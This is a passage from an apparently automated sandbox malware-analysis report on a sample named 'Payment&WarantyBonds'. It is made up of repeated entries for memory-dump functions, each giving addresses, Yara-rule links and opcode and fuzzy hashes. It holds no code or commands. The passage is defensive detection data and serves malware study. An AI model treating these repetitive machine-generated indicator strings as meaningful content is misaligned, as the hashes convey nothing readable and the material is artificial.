                                                                                                                                                                                • Opcode Fuzzy Hash: 546770970305d316d2c5a98994e9158fda362db2cdfc0e12f3ba9857f3860844
                                                                                                                                                                                • Instruction Fuzzy Hash: B90181702406859BF7729B3CDD58B263BA8BB55B48F9A0596BA01CB6F6D778D4028210
                                                                                                                                                                                Function 014C437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                • Instruction ID: 360faa03e27e653314ae2b38e21ad26c98f4bcc64372fbbc47ac3961dff18f98
                                                                                                                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                • Instruction Fuzzy Hash: BDF0E93934191347EBB5AA2F8930B2FAA559FE0D11B0D062F9501CB7B0DF30DC118790
                                                                                                                                                                                Function 014DF3E6 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8904caabf9ce7f0fa6fb6549d42dbf8f913102b9e1e2bc0634f5e091b9493944
                                                                                                                                                                                • Instruction ID: ab1edef90b12dcb3faeae76e64b13a0670ecb13da152e2267af8373959f8d410
                                                                                                                                                                                • Opcode Fuzzy Hash: 8904caabf9ce7f0fa6fb6549d42dbf8f913102b9e1e2bc0634f5e091b9493944
                                                                                                                                                                                • Instruction Fuzzy Hash: 6EF0AF70A00249AFCF04EFA9D505A9EB7F4FF28300F40406AB905EB391D634DA05CB54
                                                                                                                                                                                Function 014192FF Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 07c932e5fc5ce128f569b1f72c0a143e82d6a61c6f70b62f0124246d1eb89153
                                                                                                                                                                                • Instruction ID: 7bf7f002f2f1ed81cb50ec6f2a686e8795ac7c9bf5f55bf86369def057d65755
                                                                                                                                                                                • Opcode Fuzzy Hash: 07c932e5fc5ce128f569b1f72c0a143e82d6a61c6f70b62f0124246d1eb89153
                                                                                                                                                                                • Instruction Fuzzy Hash: B1F0F032100244ABD7329B4ACC08F9BBBEDEF98714F08011EE542831A0C6B0A908C650
                                                                                                                                                                                Function 014F55C9 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 10e4e67b90e91ac78f271524cdad4ff838407a503b6adbbabcfd18d34479670f
                                                                                                                                                                                • Instruction ID: 14f8c07083d6d61e81949df9310a90c6940bea30c063ff999cb6054832793570
                                                                                                                                                                                • Opcode Fuzzy Hash: 10e4e67b90e91ac78f271524cdad4ff838407a503b6adbbabcfd18d34479670f
                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF04F74A00249AFDB04EFA9E545A9EB7F4FF28304F10445AB919EB390D674DA01CB55
                                                                                                                                                                                Function 014E0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a2b2c6c0f96234f25602c470e6940f38152a6cbe04f585d33c468bfb264f1fae
                                                                                                                                                                                • Instruction ID: cfe706a521492e392e9b2b88c333810f424ee6a4db5da40b67b9a0b8651a787a
                                                                                                                                                                                • Opcode Fuzzy Hash: a2b2c6c0f96234f25602c470e6940f38152a6cbe04f585d33c468bfb264f1fae
                                                                                                                                                                                • Instruction Fuzzy Hash: 24F0A76651568107DF335B2C74683D2BBA5AB52510F1B148FE4B15F329C6F5C887D324
                                                                                                                                                                                Function 014F539D Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fea95e75082e3e0614b26b283a395d8e6358156f99a8ae45d1b5aedfe1aeeb1c
                                                                                                                                                                                • Instruction ID: c9417ab60ec89f894e7651d4360b173d90e79b08d82d2fced23b59b7a33c7d5d
                                                                                                                                                                                • Opcode Fuzzy Hash: fea95e75082e3e0614b26b283a395d8e6358156f99a8ae45d1b5aedfe1aeeb1c
                                                                                                                                                                                • Instruction Fuzzy Hash: 18F05470A1024D9FDB04EF79D545A5EB7B8EF58304F10805AE605EB391DA74D9058B15
                                                                                                                                                                                Function 014F52E2 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d0d2a2b71f1af38ad25b475c2311a7b646f4bd1788afa56b34dfd94e37592209
                                                                                                                                                                                • Instruction ID: 7a95a3e6c40ca5ea548c6db1e50bc692996bef25729a742025a70b87be747ddf
                                                                                                                                                                                • Opcode Fuzzy Hash: d0d2a2b71f1af38ad25b475c2311a7b646f4bd1788afa56b34dfd94e37592209
                                                                                                                                                                                • Instruction Fuzzy Hash: D7F0E270A10249AFDB04EFBAE505E6EB7F8FF28304F04405EA901EB3A0EA74D901CB14
                                                                                                                                                                                Function 014F5283 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5873487d65dd2bd19c60ef06bc49bd55d4ad46b700fc67656536c2d9bb4f08af
                                                                                                                                                                                • Instruction ID: cd192ae8651c287466c817e8bf84bc78c3bae05f0c59bd9f47b56d08f4519da7
                                                                                                                                                                                • Opcode Fuzzy Hash: 5873487d65dd2bd19c60ef06bc49bd55d4ad46b700fc67656536c2d9bb4f08af
                                                                                                                                                                                • Instruction Fuzzy Hash: 96F0BE74A10249ABDB04EFA9E505AAEB7F8BF28304F01445EB901EB3A1EA34D9018B50
                                                                                                                                                                                Function 0145C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: df738d4e4a95a363d4e862cd31967689b8f714386b23a52654b6e0c08236e31c
                                                                                                                                                                                • Instruction ID: 759046baafe181cff7d9e0a7c3a78885d0ad5e0ffc69e65ef820716c050a1e3a
                                                                                                                                                                                • Opcode Fuzzy Hash: df738d4e4a95a363d4e862cd31967689b8f714386b23a52654b6e0c08236e31c
                                                                                                                                                                                • Instruction Fuzzy Hash: CBF0BE755117519FE3A29A1CC188B527BDC9B44AA4F09942BDD0A87633C670EA82CAA0
                                                                                                                                                                                Function 014F51CB Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 86337127d4e64536160abc03a7b20ecf73eca2afa746a39a03528c04bb097fc2
                                                                                                                                                                                • Instruction ID: 2cc81b39251ea229e8509b5862c8cf8f34e97d152f8b82e57ddaa2a15ea599f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 86337127d4e64536160abc03a7b20ecf73eca2afa746a39a03528c04bb097fc2
                                                                                                                                                                                • Instruction Fuzzy Hash: 1CF082B4A10249ABDB14EBA9D505E6EB7B8BF18308F05005EBA11EB3E4EA74D901CB55
                                                                                                                                                                                Function 0149D070 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                                                                                • Instruction ID: dd21184c0f2d6a98a6f862f8ba522cda88f9f3b7a95889e53a8d06e72ec0bb99
                                                                                                                                                                                • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                                                                                • Instruction Fuzzy Hash: F2F0E53350461467C230AA4A8C05F5BFBACDBE5B70F10031ABA249B1E0DA74A911C7D6
                                                                                                                                                                                Function 014F5341 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8e8a04ee52696d061e66d00015a1ec2bd9811d66fff66c700e88a5d36bdf83fb
                                                                                                                                                                                • Instruction ID: 16cf8bb7535e7ed2e33cd1feae1cd6d6f18cd8a00b557ed0624fea99bf2d05ed
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e8a04ee52696d061e66d00015a1ec2bd9811d66fff66c700e88a5d36bdf83fb
                                                                                                                                                                                • Instruction Fuzzy Hash: 69F02770A04249ABDB04EFBDE445E9EB7F8EF19304F10005EE501EB3E0EA34D9008714
                                                                                                                                                                                Function 01457208 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ad2221102d234982d5a742a1ab3bd6256f9e5b6f634ccdf68707a0edea07f134
                                                                                                                                                                                • Instruction ID: f8ed35647f8b5f357cdc5e74a47525fa62cdec5721f13bf718b96330664e8cab
                                                                                                                                                                                • Opcode Fuzzy Hash: ad2221102d234982d5a742a1ab3bd6256f9e5b6f634ccdf68707a0edea07f134
                                                                                                                                                                                • Instruction Fuzzy Hash: 91F08C719156A59FDB62D79DC284B237BD89B04B74F0D856BEA098BB22C638D882C250
                                                                                                                                                                                Function 014F5227 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 36e426d464d073647fbc1b195bf627cbe54ab80c4d0dca0a78570a45f8f0bb06
                                                                                                                                                                                • Instruction ID: d7f3b5c808e341db1d48d0a6a27ffdf664d3ea6af29353c673b5497ad8de9298
                                                                                                                                                                                • Opcode Fuzzy Hash: 36e426d464d073647fbc1b195bf627cbe54ab80c4d0dca0a78570a45f8f0bb06
                                                                                                                                                                                • Instruction Fuzzy Hash: AFF0E270A14249ABDB14EFA9E505E6EB3B8AF18304F05005EBA01EB3A4EA34D9018754
                                                                                                                                                                                Function 014F547F Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9e7e4fb74a5c6c53166bf0fadf51b453a5dfa3086b0324bd22d0577a744e1006
                                                                                                                                                                                • Instruction ID: f6a4565324d40802c3b15d003487ce50cd41ec3dfa7205e64292a9178a5bf433
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e7e4fb74a5c6c53166bf0fadf51b453a5dfa3086b0324bd22d0577a744e1006
                                                                                                                                                                                • Instruction Fuzzy Hash: 21F08270A01249ABDB14EFA9D945F9E77B8AF18304F14006AE601EB395EA38D9058755
                                                                                                                                                                                Function 014555C0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                                                                                • Instruction ID: 421092fa6b73466dfdcda7019bb68fa1004fd9e5926deda7fc4700dd78901556
                                                                                                                                                                                • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                                                                                • Instruction Fuzzy Hash: 7BE0E533100618BBC7211E1BD800F23BB69FFA0BB0F10411BE5595B5B18774AD11CAD4
                                                                                                                                                                                Function 014225E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 7be1e7eb52e4d65b1b50021bdf944fdf09b8da8cce6e431d1da6058445ae3c19
                                                                                                                                                                                • Instruction ID: bbfe94d9e1db623be3a5c66acf6e8d446d0f26865b3c297866e58d1e2266ece6
                                                                                                                                                                                • Opcode Fuzzy Hash: 7be1e7eb52e4d65b1b50021bdf944fdf09b8da8cce6e431d1da6058445ae3c19
                                                                                                                                                                                • Instruction Fuzzy Hash: 71E09232100554ABC322BF2ADD01F8A779AEBB4764F01451AF116571A0CA74AD50C794
                                                                                                                                                                                Function 014A4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                • Instruction ID: 4a267e5c9226fff82a2563f0e263f11aa89bdb5353d881c4842bbc01db057b27
                                                                                                                                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                • Instruction Fuzzy Hash: 6FE0AE743442058BE715CF19C040B667BA6BFE5A10F6DC069A9488F305EB72A8429A40
                                                                                                                                                                                Function 014DB3D0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                                                                                • Instruction ID: eeeba296a172f1547192d6fbb52c8803b44bca5e0ca79c4a9a8bb812ddae8a8a
                                                                                                                                                                                • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                                                                                • Instruction Fuzzy Hash: FCE0C232284615BBDF226E45CC10F697B15EBA07A0F114037FA086A6B0CA75AC92E6D4
                                                                                                                                                                                Function 0141823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                • Instruction ID: 56147e6438947ce3fce7406208854882562ffe5692b41aca5ca49b79ef400131
                                                                                                                                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                • Instruction Fuzzy Hash: 0FE0CD31500512EFD7332F16DC00F9276A5FF64F14F10481FE0411507887B45C82CB45
                                                                                                                                                                                Function 01422050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fd65a07ce24a6873c541d3bc373c84e828ff0106dc165ffb08e16b14036ed52c
                                                                                                                                                                                • Instruction ID: 8f12afb9f7dd71e6442bb69fe4c24c3072ff1d4683de0b5e60707e0a05c9790a
                                                                                                                                                                                • Opcode Fuzzy Hash: fd65a07ce24a6873c541d3bc373c84e828ff0106dc165ffb08e16b14036ed52c
                                                                                                                                                                                • Instruction Fuzzy Hash: 22E0C2332004606BC322FF6EDD00F4A739EEFB4270F45022AF1558B2A0CAB4AC40C794
                                                                                                                                                                                Function 014A92BC Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 83ba1a18b824efdfb8a9e4eeb1d2098b17a98ef67856aef4c8714b312f6efd74
                                                                                                                                                                                • Instruction ID: 8ad7646469b5b002306717a10608931348e0d9fdf46ac8bdcc0be29ef0fb03b8
                                                                                                                                                                                • Opcode Fuzzy Hash: 83ba1a18b824efdfb8a9e4eeb1d2098b17a98ef67856aef4c8714b312f6efd74
                                                                                                                                                                                • Instruction Fuzzy Hash: A3F0C935251B80CBF62ADF08C1A1B5177B9F755B44F910459D4464FBA1C73A9942DB40
                                                                                                                                                                                Function 0141B562 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                                                • Instruction ID: 66b0a1248900a41f167f760a24be3206002e97239bf56c2281ce8e30cebc7965
                                                                                                                                                                                • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                                                • Instruction Fuzzy Hash: 08D02E32022620AFC7323F26EE00F833AB5EFB0B10F04002EB001264F086B0EC80C690
                                                                                                                                                                                Function 0145E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                • Instruction ID: 9f8d1217b22d9e481da9f5fb1d207726a3bc9fca9a52a75a9f8e30e51e2beba2
                                                                                                                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                • Instruction Fuzzy Hash: 58D0A933204620ABDB32AA1DFC00FC333E8BB9C720F06089EB008C7160C374AC81CA84
                                                                                                                                                                                Function 0141A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                • Instruction ID: 77c9f615573fb04996573f18dbcc86e41979947781530e45285648dc0c91f35d
                                                                                                                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                • Instruction Fuzzy Hash: B7D022332130B093CB285A566900F636D05ABC0AA0F2A002E340A93924C0288C43C2E0
                                                                                                                                                                                Function 014302A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                • Instruction ID: f071a15fc289585a890c766d60fac35107779a074ff121d55620e34128f1d3f5
                                                                                                                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
